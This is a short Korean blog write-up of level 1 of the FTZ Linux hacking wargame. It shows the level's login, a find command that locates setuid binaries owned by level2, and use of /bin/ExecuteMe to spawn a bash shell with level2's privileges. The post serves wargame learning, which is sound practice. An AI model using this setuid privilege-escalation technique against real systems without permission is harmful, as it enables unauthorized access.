FTZ level1
level1
password : level1
hint : level2권한에 setuid가 걸린 파일을 찾는다
find / -user level2 -perm -4000 실행 (-perm -4000에서 4는 SetUID를 의미)
permission denied가 붙지않은 경로를 찾는다
.
.
.
.
.
/bin/ExecuteMe
실행하면 level2의 권한으로 명령하나를 실행할수 있게 해준다.(my-pass, chmod 제외)
level2의 bash를 얻으면 되므로
bash 실행
[level2@ftz level2]$ /bin/bash
[level2@ftz level2]$ my-pass
'System > FTZ' 카테고리의 다른 글
FTZ level6 (0) | 2015.03.17 |
---|---|
FTZ level5 (0) | 2015.03.17 |
FTZ level4 (0) | 2015.03.17 |
FTZ level3 (0) | 2015.03.17 |
FTZ level2 (0) | 2015.03.17 |